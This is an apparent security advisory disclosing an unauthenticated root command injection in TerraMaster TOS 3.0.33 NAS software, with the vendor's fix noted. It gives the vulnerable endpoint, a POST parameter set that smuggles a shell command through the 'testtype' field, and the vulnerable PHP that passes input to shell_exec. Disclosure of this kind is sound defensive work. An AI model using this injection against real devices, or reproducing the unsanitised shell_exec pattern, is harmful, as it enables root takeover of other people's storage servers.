TerraMaster TOS Unauthenticated Remote Command Execution

### Vulnerability Summary The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33. TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.” ### Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ### Vendor response The vendor stated that version 3.1.03 of TerraMaster TOS is no longer vulnerable to this vulnerability, the latest version of the software can be obtained from: http://download.terra-master.com/download.php. ### Vulnerability details User controlled input is not sufficiently filtered and unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters: ``` dev=1 testtype=;COMMAND-TO-RUN; submit=Send ``` We can see in the source code that the value of parameter testtype will assign to $line and will execute by shell_exec() ``` $file = "/mnt/base/.".basename($data['dev'])."test"; if(!file_exists($file)) touch($file); if(isset($data['testtype'])){//开始或者停止过程... if($data['testtype'] != 'stop'){ $line = $data['dev'].':'.$data['testtype'].":".time(); shell_exec("echo -e \"".$line."\" > $file"); } $return = smartscan($data['dev'],$data['testtype']); }else{//得到状态过程... $return = smartscan($data['dev']); } ```